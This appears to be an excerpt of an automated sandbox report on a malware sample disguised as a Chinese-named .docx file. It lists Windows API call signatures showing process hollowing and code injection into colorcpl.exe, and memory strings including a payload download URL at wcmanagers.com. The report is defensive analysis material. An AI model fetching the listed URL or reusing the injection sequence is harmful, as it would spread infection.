Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, | 0_2_029858B4 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 8_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 8_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 8_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 8_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 8_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 10_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 10_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 10_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 10_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 10_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 12_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 12_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 12_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 12_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 12_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 14_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 14_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 14_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 14_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 14_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 17_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 17_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 17_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 17_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 17_2_00007FF64B5635B8 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 31_2_04589665 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 31_2_04589253 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, | 31_2_0459C291 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, | 31_2_0458C34D |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, | 31_2_0458BD37 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045CE879 FindFirstFileExA, | 31_2_045CE879 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, | 31_2_0458880C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458783C FindFirstFileW,FindNextFileW, | 31_2_0458783C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW, | 31_2_04599AF5 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, | 31_2_0458BB30 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# |
Source: colorcpl.exe | String found in binary or memory: http://geoplugin.net/json.gp |
Source: colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C |
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.dr | String found in binary or memory: http://www.pmail.com |
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: SystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.localP |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/ |
Source: drbdmeyP.pif, 00000003.00000001.1257794553.00000000004CC000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps03 |
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, | 0_2_029981B8 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 0_2_0299C7B4 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 0_2_0299C724 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299A524 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle, | 0_2_0299A524 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, | 0_2_02997A94 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299DA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, | 0_2_0299DA24 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, | 0_2_0299C898 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299D9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, | 0_2_0299D9A4 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, | 0_2_02997944 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997E14 LoadLibraryExA,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,FreeLibrary, | 0_2_02997E14 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, | 0_2_02997CC8 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029981B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, | 0_2_029981B6 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 0_2_0299C6AC |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 0_2_0299C7B2 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, | 0_2_02997A92 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029979D8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory, | 0_2_029979D8 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, | 0_2_02997942 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, | 8_2_00007FF64B578114 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, | 8_2_00007FF64B58BCF0 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, | 8_2_00007FF64B5788C0 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, | 8_2_00007FF64B577FF8 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57898C NtQueryInformationToken, | 8_2_00007FF64B57898C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, | 8_2_00007FF64B563D94 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, | 8_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken, | 8_2_00007FF64B5789E4 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, | 10_2_00007FF64B578114 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, | 10_2_00007FF64B58BCF0 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, | 10_2_00007FF64B5788C0 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, | 10_2_00007FF64B577FF8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B57898C NtQueryInformationToken, | 10_2_00007FF64B57898C |
